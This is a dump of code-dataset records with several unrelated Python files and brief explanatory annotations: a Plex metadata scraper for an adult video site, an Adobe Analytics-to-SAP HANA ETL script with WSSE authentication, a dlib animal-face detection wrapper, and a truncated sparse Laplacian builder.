searchResult.xpath('./a/@href')[0]\n curID = PAutils.Encode(url)\n\n score = 100 - Util.LevenshteinDistance(searchData.title.lower(), titleNoFormatting.lower())\n\n 
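The search loop above accepts scenes within two days of the target date and docks ten points per day of drift before applying the Levenshtein title penalty. The date half of that scoring rule, isolated as a hypothetical helper:

from datetime import date

def date_match_score(target, candidate, window_days=2):
    # Returns 100 for an exact match, minus 10 per day of difference,
    # and None for anything outside the window.
    diff = abs((target - candidate).days)
    return 100 - diff * 10 if diff <= window_days else None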
results.Append(MetadataSearchResult(id='%s|%d' % (curID, siteNum), name='%s [%s]' % (titleNoFormatting, PAsearchSites.getSearchSiteName(siteNum)), score=score, lang=lang))\n\n return results\n\n\ndef dateFromIso(dateString):\n return datetime.strptime(dateString, '%Y-%m-%d').date()\n\n\ndef update(metadata, lang, siteNum, movieGenres, movieActors, art):\n metadata_id = str(metadata.id).split('|')\n sceneURL = PAutils.Decode(metadata_id[0])\n if 'http' not in sceneURL:\n sceneURL = PAsearchSites.getSearchBaseURL(siteNum) + sceneURL\n req = PAutils.HTTPRequest(sceneURL)\n detailsPageElements = HTML.ElementFromString(req.text)\n\n # Title\n metadata.title = getTitle(detailsPageElements)\n\n # Summary\n description = detailsPageElements.xpath('//div[text()=\"Description:\"]/following-sibling::div')\n if description:\n metadata.summary = description[0].text_content().strip()\n\n # Studio\n metadata.studio = 'PornWorld'\n\n # Tagline / Collection\n metadata.collections.clear()\n tagline = PAsearchSites.getSearchSiteName(siteNum)\n metadata.tagline = tagline\n metadata.collections.add(tagline)\n\n # Release Date\n date = detailsPageElements.xpath('//i[contains(@class, \"bi-calendar\")]')\n if date:\n date_object = parse(date[0].text_content().strip())\n metadata.originally_available_at = date_object\n metadata.year = metadata.originally_available_at.year\n\n # Genres\n movieGenres.clearGenres()\n for genreLink in detailsPageElements.xpath('//div[contains(@class, \"genres-list\")]//a'):\n genreName = genreLink.text_content().strip()\n\n movieGenres.addGenre(genreName)\n\n # Actors\n movieActors.clearActors()\n for actorLink in detailsPageElements.xpath('//h1[contains(@class, \"watch__title\")]//a'):\n actorName = actorLink.text_content().strip()\n actorPhotoURL = ''\n # actorPhotoURL = 'http:' + actorLink.get('data-src')\n\n movieActors.addActor(actorName, actorPhotoURL)\n\n # Posters\n art.append(detailsPageElements.xpath('//video/@data-poster')[0])\n\n Log('Artwork found: %d' % len(art))\n for idx, posterUrl in enumerate(art, 1):\n if not PAsearchSites.posterAlreadyExists(posterUrl, metadata):\n try:\n image = PAutils.HTTPRequest(posterUrl)\n im = StringIO(image.content)\n resized_image = Image.open(im)\n width, height = resized_image.size\n # Add the image proxy items to the collection\n if width > 1:\n # Item is a poster\n metadata.posters[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n if width > 100:\n # Item is an art item\n metadata.art[posterUrl] = Proxy.Media(image.content, sort_order=idx)\n except:\n pass\n\n return metadata\n\n\ndef getTitle(htmlElements):\n titleNoFormatting = htmlElements.xpath('//title')[0].text_content().strip()\n\n return re.sub(r' - PornWorld$', '', titleNoFormatting)\n","sub_path":"Contents/Code/networkPornWorld.py","file_name":"networkPornWorld.py","file_ext":"py","file_size_in_byte":8707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"22501388","text":"import base64\nimport hashlib\nimport json\nimport logging\nimport random\n\nimport datetime\nimport pandas as pd\nimport pytz\nimport time\nfrom dateutil.parser import parse\nimport numpy as np\nfrom pandas.io.json import json_normalize\n\n#from adobe.constants import API_HOST, PATH, CONFIG_FILE, HANA_CONFIG_FILE, SCRIPT_FOLDER_NAME\nfrom constants import API_HOST, PATH, CONFIG_FILE, HANA_CONFIG_FILE, SCRIPT_FOLDER_NAME\nfrom base.base_api_interface import BaseApiInterface\nfrom base.db_wrapper import PyHdbWrapper\nfrom base.utils import 
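getTitle at the end of the record above trims the site suffix from the page title with a regular expression anchored to the end of the string. Generalized slightly (the suffix value comes from the code itself, not from any documentation):

import re

def clean_title(raw_title, suffix=' - PornWorld'):
    # re.escape keeps the end-anchored pattern safe if the suffix ever
    # contains regex metacharacters.
    return re.sub(re.escape(suffix) + r'$', '', raw_title.strip())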
Utils\n\nnonce_seed = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c',\n 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C',\n 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\nlogger = logging.getLogger(__name__)\n\n\nclass AdobeBase(BaseApiInterface):\n def __init__(self, kargs):\n logger.info(\"class initiated\")\n # self.metrics = kargs['metric-list']\n # self.elements = kargs['element-list']\n # self.element_names = kargs['element-names']\n # self.segments = kargs['segment-list']\n self.da_path = kargs['da-path']\n self.date_from = kargs['date-from']\n self.date_to = kargs['date-to']\n self.date_granularity = kargs['date-granularity']\n self.sleep_time = float(kargs['sleep-time'])\n self.schema = kargs['schema-name']\n\n def get_endpoint_url(self, query):\n return API_HOST + PATH + query\n\n def get_payload(self, dateFrom, dateTo, dateGranularity):\n return {\n 'reportDescription': {\n 'reportSuiteID': 'servn-servicenow.com-prod', # servn-servicenow.com-prod 'servn-geneva-prod'\n 'dateFrom': dateFrom,\n 'dateTo': dateTo,\n 'dateGranularity': dateGranularity,\n 'locale': 'en_US',\n 'metrics': [\n {\n 'id': 'uniquevisitors'\n },\n {\n 'id': 'visits'\n },\n {\n 'id': 'pageviews'\n },\n {\n 'id': 'bounces'\n },\n {\n 'id': 'cm5509_576af356408496930352c481'\n },\n {\n 'id': 'event89'\n },\n {\n 'id': 'event17'\n },\n {\n 'id': 'cm5509_59e1193408051050b2f3ec64'\n },\n {\n 'id': 'totalvisitorsweekly'\n },\n {\n 'id': 'entries'\n },\n {\n 'id': 'totaltimespent'\n },\n\n ],\n 'elements':[\n\n {\n 'id': 'eVar48',\n 'classification': 'SurfID',\n\n },\n\n {\n 'id': 'evar2',\n # 'classification': 'Page URL',\n 'name': 'Page URL c02'\n\n },\n\n # {\n # 'id': 'eVar46',\n # 'classification': 'Company Name',\n #\n # },\n # {\n # 'id': 'lasttouchchannel',\n # # \"name\": \"Last Touch Marketing Channel\"\n #\n # },\n # {\n # 'id': 'eVar48',\n # 'classification': 'SurfID',\n #\n # },\n # {\n # 'id':'evar2',\n # #'classification': 'Page URL',\n # 'name': 'Page URL c02'\n #\n # },\n # {\n # 'id': 'evar51',\n # 'name': 'Internal Search Term c51',\n # },\n # {\n # 'id': 'evar19',\n # 'name': 'Internal Campaign ID c19',\n # }\n #]\n\n ],\n 'segments': [\n # {\n # #'id': 's300007365_56d8b42ce4b0735cde722317'\n # 'id': 's300007365_5b1ee51fbef0d34e1bda4081'\n # },\n # {\n # 'id':'s300007365_5c241d2b120ebf0fa5ab523e',\n # },\n {\n 'id': 's300007365_5c241d4e9bfec133d16ebefd'\n }\n\n ]\n }\n }\n\n def get_header(self, username, digest, nonce_b, iso_time):\n header_args = 'UsernameToken Username=\"' + username + \\\n '\", PasswordDigest=\"' + digest + \\\n '\", Nonce=\"' + nonce_b + \\\n '\", Created=\"' + iso_time + \\\n '\"'\n header_args = bytes(header_args, 'utf-8')\n\n return {\n 'X-WSSE': header_args\n }\n\n def get_unique_connection_parameters(self, api_secret):\n\n nonce = ''.join(random.sample(nonce_seed, 16))\n nonce_b = base64.b64encode(nonce.encode('ascii'))\n\n date = datetime.datetime.now(tz=pytz.utc)\n date = date.astimezone(pytz.timezone('US/Pacific'))\n\n iso_time = date.strftime(\"%Y-%m-%dT%H:%M:%S\")\n # iso_time = time.strftime(\"%Y-%m-%dT%H:%M:%S\")\n\n # This is the process to create digest which is used in header\n passwd = nonce + iso_time + api_secret\n passwd = passwd.encode()\n hash_new = hashlib.sha1(passwd).digest()\n digest = base64.b64encode(hash_new)\n return nonce_b.decode('ascii'), iso_time, digest.decode('ascii')\n\n 
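get_header and get_unique_connection_parameters above implement WSSE UsernameToken authentication: the password digest is base64(sha1(nonce + created + secret)), and the nonce itself is sent base64-encoded. A condensed sketch of the same handshake on the standard library (UTC here for brevity; the class above converts the timestamp to US/Pacific):

import base64
import hashlib
import secrets
from datetime import datetime, timezone

def wsse_header(username, api_secret):
    nonce = secrets.token_hex(8)  # 16 characters, analogous to the sampler above
    created = datetime.now(timezone.utc).strftime('%Y-%m-%dT%H:%M:%S')
    digest = base64.b64encode(
        hashlib.sha1((nonce + created + api_secret).encode()).digest()).decode()
    token = ('UsernameToken Username="{0}", PasswordDigest="{1}", '
             'Nonce="{2}", Created="{3}"').format(
                 username, digest,
                 base64.b64encode(nonce.encode()).decode(), created)
    return {'X-WSSE': token}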
def response_handler(self, data_df):\n db_obj = PyHdbWrapper()\n cursor, connection = db_obj.connect_hana(\n Utils.get_file_path(self.da_path, [SCRIPT_FOLDER_NAME, HANA_CONFIG_FILE]), 'HANA_ENV')\n ''' Truncate staging table before inserting records'''\n delete_page_url = db_obj.get_delete_query(self.schema + '.STG_ADOBE_CSC_DAILY')\n db_obj.execute_sql(cursor, connection, delete_page_url, '', 'DELETE')\n\n # Extract Date will be used as a bookmark for loading data into HANA\n extract_date = datetime.datetime.today()\n\n for index, row in data_df.iterrows(): # Outer Loop for Day Specific data\n table = row.iloc[0] # Table is of type Dictionary\n source_date = str(datetime.date(table['year'], table['month'], table['day']))\n source_date = datetime.datetime.strptime(source_date, \"%Y-%m-%d\")\n breakdown = (table['breakdown']) # Breakdown is type of list\n for i in breakdown:\n if 'breakdown' in i.keys():\n country = i['name']\n # print(i['breakdownTotal'])\n temp = i['breakdown']\n # for i in breakdown:\n # if 'breakdown' in i.keys():\n # country = i['name']\n # # print(i['breakdownTotal'])\n # temp = i['breakdown']\n for i in temp:\n counts = i['counts']\n pageviews = counts[0]\n visits = counts[1]\n uniquevisitors = counts[2]\n bouncerate = counts[3]\n averageTimeSpentOnSite = counts[4]\n url = i['name']\n print(source_date, country, url + '\\n' + pageviews, visits, uniquevisitors, bouncerate)\n column_name = [\"PERIOD_DATE\", \"GRANULARITY\", \"COUNTRY\", \"URL\"\n , \"PAGE_VIEWS_COUNT\", \"PAGE_VISITS_COUNT\", \"UNIQUE_VISITOR_COUNT\"\n , \"BOUNCE_RATE_%%\", \"AVG_TIME_SPENT_ON_PAGE\", \"EXTRACT_DATE\"]\n insert_query = db_obj.get_insert_query(self.schema + \".STG_ADOBE_CSC_DAILY\",\n column_name)\n\n values = [source_date, self.date_granularity, country, url, pageviews, visits,\n uniquevisitors, bouncerate, averageTimeSpentOnSite, extract_date]\n print(values)\n\n\n db_obj.execute_sql(cursor, connection, insert_query, values, 'INSERT')\n\n upsert_statement = \"UPSERT \\\"\" + self.schema + \"\\\".\\\"ADOBE_CSC_DAILY\\\" \\\n SELECT * FROM \\\"\" + self.schema + \"\\\".\\\"STG_ADOBE_CSC_DAILY\\\"\"\n db_obj.execute_sql(cursor, connection, upsert_statement, '', 'UPSERT')\n\n #\n # def recursive_fun(self, element):\n # breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element[\"breakdown\"])], ignore_index=True)\n\n # def iterdict(d):\n # for k, v in d.items():\n # if isinstance(v, list):\n # iterdict(v)\n # else:\n # print (k, \":\", v)\n\n def iterdict(self,d, breakdowndf):\n print (\"Data is:{}\".format(d))\n for element in d:\n #if element.has_key('breakdown'):\n #print(\"Element is: {}\".format(element))\n breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element)], ignore_index=True)\n if \"breakdown\" in element:\n breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element[\"breakdown\"])], ignore_index=True)\n for list_element in element[\"breakdown\"]:\n if isinstance(list_element.get(\"breakdown\",None), list):\n #print (list_element[\"breakdown\"])\n self.iterdict(list_element[\"breakdown\"], breakdowndf)\n #print (breakdowndf)\n\n return breakdowndf\n\n\n # def date_conversion(self, column_value):\n # if (column_value is not None) and (column_value is not '') and (column_value is not pd.np.nan):\n # column_value_list = list(column_value)\n # if column_value_list[-6] == '.':\n # temp_datetime = datetime.datetime.strptime(column_value, '%a. %d %b. %Y').strftime('%Y-%m-%d')\n # else:\n # temp_datetime = datetime.datetime.strptime(column_value, '%a. 
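iterdict above is meant to flatten Adobe's nested 'breakdown' lists into one DataFrame, but the recursive call's return value is discarded and the accumulator is rebound locally, so levels deeper than two are lost. A sketch of a version that actually accumulates across levels, assuming the same record shape:

import pandas as pd

def flatten_breakdowns(nodes, rows=None, depth=0):
    # Collect every node of a nested 'breakdown' tree into flat rows.
    rows = [] if rows is None else rows
    for node in nodes:
        rows.append({'depth': depth,
                     'name': node.get('name'),
                     'counts': node.get('counts')})
        children = node.get('breakdown')
        if isinstance(children, list):
            flatten_breakdowns(children, rows, depth + 1)
    return pd.DataFrame(rows)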
%d %b %Y').strftime('%Y-%m-%d')\n # return temp_datetime\n # else:\n # return None\n\n def date_conversion(self, column_value):\n if (column_value is not None) and (column_value is not '') and (column_value is not pd.np.nan):\n\n value = column_value.split(' - ')\n column_value_list_start = list(value[0])\n if column_value_list_start[-6] == '.':\n temp_datetime = datetime.datetime.strptime(value[0], '%a. %d %b. %Y').strftime('%Y-%m-%d')\n\n else:\n temp_datetime = datetime.datetime.strptime(value[0], '%a. %d %b %Y').strftime('%Y-%m-%d')\n\n return temp_datetime\n\n else:\n return None\n\n\n def main(self):\n '''\n This function will be called from the main.py file and contains the\n logic to fetch data from source and will save it to designation.\n :return:\n '''\n '''\n from_ini function will read the configuration file as per given section name and key name \n and will provide dict of configuration parameters.\n '''\n #print (\"Date granularity is: {}\".format(self.date_granularity))\n adobe_config = Utils.from_ini(\n Utils.get_file_path(\n self.da_path,\n [SCRIPT_FOLDER_NAME, CONFIG_FILE]),\n 'Adobe_Analytics',\n ('username', 'api_secret'))\n\n '''\n Getting end point url \n '''\n query_url = self.get_endpoint_url('method=Report.Queue')\n print (\"\\n\")\n print (query_url)\n print (\"\\n\")\n\n '''\n Getting payload to be passed with the api\n '''\n payload = json.dumps(self.get_payload(self.date_from, self.date_to, self.date_granularity))\n print (\"------------------------------------\")\n print (\"Payload is:\")\n print (payload)\n print (\"------------------------------------\")\n print (\"\\n\")\n '''\n Preparing parameters for passing in header with api for authentication\n '''\n nonce_b, iso_time, digest = self.get_unique_connection_parameters(adobe_config['api_secret'])\n\n '''\n Get header\n '''\n head = self.get_header(adobe_config['username'], digest, nonce_b, iso_time)\n\n print (\"------------------------------------\")\n print (\"Header is:\")\n print (head)\n print (\"------------------------------------\")\n print (\"\\n\")\n\n\n '''\n Calling api for preparing reports\n '''\n report_queue_api_response = Utils.send_request('POST', query_url, payload, head)\n\n if report_queue_api_response.status_code != 200:\n logger.error(report_queue_api_response.text)\n raise Exception(report_queue_api_response.reason)\n\n report_queue_response_body = report_queue_api_response.text.encode('ascii')\n temp_var = report_queue_response_body.split(b':')\n report_id = temp_var[1].replace(b'}', b'')\n # print(report_id)\n\n '''\n Section - 2: Get data based on report developed and save the JSON reply in shared folder \n '''\n\n '''\n Developing API URL for retrieving\n '''\n query_url = self.get_endpoint_url('method=Report.Get') # 'method=Report.GetMetrics'\n\n # The body of the API url is enclosed as post_params\n bodydata = {\n 'reportID': '' + report_id.decode('ascii') + ''\n }\n payload = json.dumps(bodydata)\n\n counter_error = 0\n while (counter_error == 0):\n # Using sleep method to give enough time to get the reort ready to pull the data else it will throw\n # \"Report not ready\"\n print(\"Start sleep time \" + time.strftime(\"%X\"))\n print (\"\\n\")\n time.sleep(self.sleep_time)\n\n '''\n Get connection parameter for getting reports data\n and get header\n '''\n nonce_b, iso_time, digest = self.get_unique_connection_parameters(adobe_config['api_secret'])\n head = self.get_header(adobe_config['username'], digest, nonce_b, iso_time)\n\n # logger\n\n '''\n Call api to get reports\n 
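date_conversion above distinguishes 'Sat. 01 Dec. 2018' from 'Sat. 01 Dec 2018' by inspecting the sixth character from the end. Trying each strptime format in turn is sturdier and needs no positional check; a sketch over the same Adobe range labels:

from datetime import datetime

def parse_report_date(label):
    # Parse the start of a range label such as
    # 'Sat. 1 Dec. 2018 - Fri. 7 Dec. 2018' into YYYY-MM-DD.
    start = label.split(' - ')[0]
    for fmt in ('%a. %d %b. %Y', '%a. %d %b %Y'):
        try:
            return datetime.strptime(start, fmt).strftime('%Y-%m-%d')
        except ValueError:
            continue
    return None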
'''\n api_response = Utils.send_request('POST', query_url, payload, head)\n if api_response.status_code != 200:\n print(api_response)\n continue\n\n try:\n response_body = json.loads(api_response.text)\n print (\"------------------------------------\")\n print (\"API Response is:\")\n print (\"\\n\")\n print (\"Response is: {}\".format(response_body))\n print (\"------------------------------------\")\n print (\"\\n\")\n\n\n metricsdf = pd.DataFrame(response_body[\"report\"][\"metrics\"])\n datadf = pd.DataFrame(response_body[\"report\"][\"data\"])\n outerdf = pd.DataFrame()\n #breakdowndf_2 = pd.DataFrame()\n\n for breakdown_data in response_body[\"report\"][\"data\"]:\n for element in breakdown_data[\"breakdown\"]:\n innerdf = pd.DataFrame()\n final_data = {}\n final_data[\"ITEM\"] = []\n final_data[\"ACCOUNT_NUMBER\"] = []\n final_data[\"UNIQUE_VISITORS\"] = []\n final_data[\"VISITS\"] = []\n final_data[\"PAGE_VIEWS\"] = []\n final_data[\"BOUNCES\"] = []\n final_data[\"TIME_SPENT_ON_PAGE_(MIN)\"] = []\n final_data[\"E89_VIDEO_VIEWS\"] = []\n final_data[\"E17_FORM_SUCCESS\"] = []\n final_data[\"FORM_SUBMISSIONS\"] = []\n final_data[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"] = []\n final_data[\"ENTRIES\"] = []\n final_data[\"TOTAL_TIME_SPENT\"] = []\n final_data[\"START_DATE_OF_WEEK\"] = []\n final_data[\"GRANULARITY\"] = []\n final_data[\"START_DATE_OF_WEEK\"].append(breakdown_data[\"name\"])\n final_data[\"GRANULARITY\"].append(self.date_granularity)\n final_data[\"ACCOUNT_NUMBER\"].append(element[\"name\"])\n if \"breakdown\" in element:\n for pageurl in element[\"breakdown\"]:\n final_data[\"ITEM\"].append(pageurl[\"name\"])\n final_data[\"UNIQUE_VISITORS\"].append(pageurl[\"counts\"][0])\n final_data[\"VISITS\"].append(pageurl[\"counts\"][1])\n final_data[\"PAGE_VIEWS\"].append(pageurl[\"counts\"][2])\n final_data[\"BOUNCES\"].append(pageurl[\"counts\"][3])\n final_data[\"TIME_SPENT_ON_PAGE_(MIN)\"].append(pageurl[\"counts\"][4])\n final_data[\"E89_VIDEO_VIEWS\"].append(pageurl[\"counts\"][5])\n final_data[\"E17_FORM_SUCCESS\"].append(pageurl[\"counts\"][6])\n final_data[\"FORM_SUBMISSIONS\"].append(pageurl[\"counts\"][7])\n final_data[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"].append(pageurl[\"counts\"][8])\n final_data[\"ENTRIES\"].append(pageurl[\"counts\"][9])\n final_data[\"TOTAL_TIME_SPENT\"].append(pageurl[\"counts\"][10])\n\n innerdf[\"ITEM\"] = final_data[\"ITEM\"]\n innerdf[\"UNIQUE_VISITORS\"] = final_data[\"UNIQUE_VISITORS\"]\n innerdf[\"VISITS\"] = final_data[\"VISITS\"]\n innerdf[\"PAGE_VIEWS\"] = final_data[\"PAGE_VIEWS\"]\n innerdf[\"BOUNCES\"] = final_data[\"BOUNCES\"]\n innerdf[\"TIME_SPENT_ON_PAGE_(MIN)\"] = final_data[\"TIME_SPENT_ON_PAGE_(MIN)\"]\n innerdf[\"E89_VIDEO_VIEWS\"] = final_data[\"E89_VIDEO_VIEWS\"]\n innerdf[\"E17_FORM_SUCCESS\"] = final_data[\"E17_FORM_SUCCESS\"]\n innerdf[\"FORM_SUBMISSIONS\"] = final_data[\"FORM_SUBMISSIONS\"]\n innerdf[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"] = final_data[\"TOTAL_WEEKLY_UNIQUE_VISITORS\"]\n innerdf[\"ENTRIES\"] = final_data[\"ENTRIES\"]\n innerdf[\"TOTAL_TIME_SPENT\"] = final_data[\"TOTAL_TIME_SPENT\"]\n innerdf[\"ACCOUNT_NUMBER\"] = pd.Series(final_data[\"ACCOUNT_NUMBER\"])\n #innerdf.fillna(method='ffill', inplace=True)\n innerdf[\"ACCOUNT_NUMBER\"] = innerdf[\"ACCOUNT_NUMBER\"].fillna(method='ffill')\n innerdf[\"START_DATE_OF_WEEK\"] = pd.Series(final_data[\"START_DATE_OF_WEEK\"])\n innerdf[\"START_DATE_OF_WEEK\"] = innerdf[\"START_DATE_OF_WEEK\"].fillna(method='ffill')\n innerdf[\"GRANULARITY\"] = 
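The loop above polls Report.Get after a fixed sleep and retries on any non-200 response, but it never gives up. A generic, bounded version of that polling pattern:

import time

def poll_until_ready(fetch, is_ready, interval, max_attempts=60):
    # Call fetch() every `interval` seconds until is_ready(response).
    for _ in range(max_attempts):
        time.sleep(interval)
        response = fetch()
        if is_ready(response):
            return response
    raise TimeoutError('report not ready after %d attempts' % max_attempts)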
pd.Series(final_data[\"GRANULARITY\"])\n innerdf[\"GRANULARITY\"] = innerdf[\"GRANULARITY\"].fillna(method='ffill')\n # outerdf['ETL_EXTRACT_DATE'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n #print (outerdf)\n #outerdf = pd.concat([outerdf,innerdf], ignore_index=True)\n outerdf = pd.concat([outerdf, innerdf], axis=0, ignore_index=True)\n outerdf = outerdf.drop_duplicates()\n\n columns = [\"ITEM\", \"UNIQUE_VISITORS\", \"VISITS\", \"PAGE_VIEWS\", \"BOUNCES\", \"TIME_SPENT_ON_PAGE_(MIN)\",\n \"E89_VIDEO_VIEWS\", \"E17_FORM_SUCCESS\", \"FORM_SUBMISSIONS\", \"TOTAL_WEEKLY_UNIQUE_VISITORS\",\n \"ENTRIES\",\"TOTAL_TIME_SPENT\"\t, \"ACCOUNT_NUMBER\", \"START_DATE_OF_WEEK\", \"GRANULARITY\", \"SEGMENT_ID\",\n \"GROUP\", \"ETL_EXTRACT_DATE\"]\n\n # outerdf['SEGMENT_ID'] = \"SUCCESS_PAGE\"\n outerdf['SEGMENT_ID'] = \"VALUE_CALCULATOR\"\n outerdf['GROUP'] = \"CUSTOMER_SUCCESS\"\n outerdf['ETL_EXTRACT_DATE'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n outerdf[\"START_DATE_OF_WEEK\"] = outerdf[\"START_DATE_OF_WEEK\"].map(self.date_conversion)\n print (outerdf.columns)\n outerdf = outerdf[columns]\n outerdf = outerdf.replace([np.inf, -np.inf], np.nan)\n outerdf = outerdf.replace('', np.NaN)\n outerdf = outerdf.replace('None', np.NaN)\n outerdf = outerdf.replace('nan', np.NaN)\n outerdf = outerdf.where((pd.notnull(outerdf)), None)\n db_obj = PyHdbWrapper()\n cursor, connection = db_obj.connect_hana(\n Utils.get_file_path(self.da_path, [SCRIPT_FOLDER_NAME, HANA_CONFIG_FILE]), 'HANA_ENV')\n # delete_page_url = db_obj.get_delete_query(self.schema + '.STG_ADOBE_CSC_DAILY')\n # db_obj.execute_sql(cursor, connection, delete_page_url, '', 'DELETE')\n for record in outerdf.to_dict(\"records\"):\n insert_query = db_obj.get_insert_query(self.schema + \".STG_ADOBE_CSC_WEEKLY\",\n record)\n\n values = list(record.values())\n #print(values)\n print (\"Inserting into Staging table\")\n db_obj.execute_sql(cursor, connection, insert_query, tuple(values), 'INSERT')\n print (\"Completed inserting into Staging table\")\n\n print(\"All records are inserted into Staging table\")\n # print (\"Upserting into Target table\")\n #\n # upsert_statement = \"UPSERT \\\"\" + self.schema + \"\\\".\\\"ADOBE_CSC_DAILY\\\" \\\n # SELECT * FROM \\\"\" + self.schema + \"\\\".\\\"STG_ADOBE_CSC_DAILY\\\"\"\n # db_obj.execute_sql(cursor, connection, upsert_statement, '', 'UPSERT')\n #\n # print (\"Completed upserting to target table\")\n\n\n\n\n\n #print(outerdf)\n\n outerdf.to_csv(r'C:\\Users\\chanukya.konduru\\Documents\\testing.csv', index=False)\n\n # breakdowndf = pd.concat([breakdowndf, pd.DataFrame(element[\"breakdown\"])], ignore_index=True)\n # # breakdowndf_2 = pd.concat([breakdowndf_2, pd.DataFrame(element[\"breakdown\"][0][\"breakdown\"])], ignore_index=True)\n #\n #\n # breakdowndf_2 = pd.DataFrame(element[\"breakdown\"][0][\"breakdown\"])\n #\n # #print (breakdowndf_2)\n # names = metricsdf['name'].tolist()\n # for i,name in enumerate(names):\n # breakdowndf[name] = [metricname[i] for metricname in list(breakdowndf['counts'].tolist())]\n #\n # #print (breakdowndf.head())\n # breakdowndf.drop(['counts', 'url'], axis=1, inplace=True)\n # #breakdowndf = breakdowndf[['name', 'e17 Form Success', 'e89 Video Views']]\n # breakdown_length = len(response_body[\"report\"][\"data\"][0][\"breakdown\"])\n # breakdowndf[\"Granularity\"] = self.date_granularity\n # #print (breakdowndf)\n # # 
breakdowndf.to_csv(r'C:\\Users\\rajkiran.reddy\\Desktop\\SNow-Projects\\Framework\\master_\\Git_Repositories\\adobe_analytics\\testing.csv')\n\n\n\n\n\n counter_error = counter_error + 1\n\n # # Using Pandas library to load json data and transpose it for easy manuplation\n # adobe_ana_pd = pd.DataFrame.from_dict(response_body)\n # adobe_ana_pd = adobe_ana_pd.T\n # # Removing unwanted index from the dataFrame\n # adobe_ana_pd = adobe_ana_pd.drop(adobe_ana_pd.index[1:])\n #\n # # The metrics for Adobe Analytics is in 'data' column, so parsing it\n # final_data_df = pd.DataFrame(adobe_ana_pd['data'][0][0]['breakdown'])\n # #print (final_data_df.columns)\n # final_data_df = final_data_df.rename(columns={\"counts\": \"Counts\",\n # \"name\": \"Surf ID\",\n # \"url\": \"URL\"})\n #\n # final_data_df = final_data_df[[\"Counts\", \"Surf ID\"]]\n # final_data_df['Granularity'] = adobe_ana_pd['data'][0][0]['name']\n #\n # if len(adobe_ana_pd['data'][0][0]['breakdown'][0]['counts']) > 1:\n # final_data_df['Visits'] = final_data_df['Counts'].map(get_visits)\n # final_data_df['e17 Form Success'] = final_data_df['Counts'].map(get_form_success)\n # final_data_df['e89 Video Views'] = final_data_df['Counts'].map(get_video_views)\n # else:\n # final_data_df['Return Visits + Visits'] = final_data_df['Counts'].map(get_return_visits)\n #\n # final_data_df_columns = list(final_data_df.columns)\n # final_data_df_columns.remove('Counts')\n # final_data_df = final_data_df[final_data_df_columns]\n # print (final_data_df)\n #\n # if 'error' in response_body.keys():\n # if 'report_not_ready' in response_body['error']:\n # pass\n # else:\n # logger.error(api_response.text)\n # raise Exception(api_response.reason)\n # elif 'report' in response_body.keys():\n # counter_error = 1\n except Exception as e:\n logger.error(e)\n raise\n #\n #\n # # # Using Pandas library to load json data and transpose it for easy manuplation\n # # adobe_ana_pd = pd.DataFrame.from_dict(response_body)\n # # adobe_ana_pd = adobe_ana_pd.T\n # #\n # # # Removing unwanted index from the dataFrame\n # # adobe_ana_pd = adobe_ana_pd.drop(adobe_ana_pd.index[1:])\n # #\n # # # The metrics for Adobe Analytics is in 'data' column, so parsing it\n # # data_df = pd.read_json((adobe_ana_pd['data']).to_json())\n # # #print (data_df.head())\n # #\n # # # datetime.datetime.strptime(str(datetime.date.today()),\"%Y-%m-%d\")\n # #\n # #\n # # # call delete from table bane before processing response\n # # # also add the migration from staging to main table\n # #\n # # # Iterating over the JSON file to extract metrics\n # # self.response_handler(data_df)\n","sub_path":"adobe/adobe_base_file1.py","file_name":"adobe_base_file1.py","file_ext":"py","file_size_in_byte":27639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"169324045","text":"from image_detectoin.animal_face.dlib_face_detection.data_helper import DlibDataHelper\nfrom image_detectoin.animal_face.dlib_face_detection.detector import Detector\nfrom image_detectoin.animal_face.dlib_face_detection.model import DlibModel\n\n\ndef dlib_train(model_type):\n data_url = \"https://raw.githubusercontent.com/wangshengguang/image-detection/master/training_data.tar.gz\"\n DlibDataHelper(model_type).maybe_download_extract(data_url)\n model = DlibModel(model_type)\n model.train_shape_predictor()\n model.train_object_detector()\n model.view_object_detector()\n\n\nclass DlibPrediction(object):\n def __init__(self, model_type):\n self.detector = Detector(model_type)\n\n 
def predict(self, image_path):\n faces = self.detector.detect(image_path=image_path)\n return faces\n","sub_path":"image_detectoin/animal_face/animal_face.py","file_name":"animal_face.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"44268430","text":"import numpy as np\n#pythran export build2(int)\ndef build2(size):\n #how many coefficients ?\n nc= 5*(size-2)**2+ 16*(size-2)+ 12\n row= np.empty((nc),dtype=int)\n col=np.empty((nc),dtype=int)\n v=np.empty((nc),dtype=float)\n h=1./(size-1)\n h2=h*h\n cd=-4/h2\n hd=1./h2;\n I=lambda i,j: i*size+j\n count=0\n\n for i in range(0,size):\n for j in range(0,size):\n l=I(i,j)\n row[count]=l\n col[count]=l\n v[count]=cd\n count+=1\n for i1 in [-1,1]:\n if i+i1>=0 and i+i1=0 and j+i1
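The build2 record above lost its comparison operators to markup stripping (the bounds checks now read 'i+i1>=0 and i+i1=0 and j+i1') and the function is cut off. From what survives, a -4/h2 diagonal entry per grid point plus 1/h2 couplings to in-bounds neighbors, it appears to assemble a 5-point finite-difference Laplacian in (row, col, value) triplet form. A hedged reconstruction of that idea with SciPy; the 0 <= neighbor < size tests are an assumption about what the stripped comparisons originally said:

from scipy.sparse import coo_matrix

def laplacian_2d(size):
    # Assemble the 5-point Laplacian on a size x size grid in COO form.
    h2 = (1.0 / (size - 1)) ** 2
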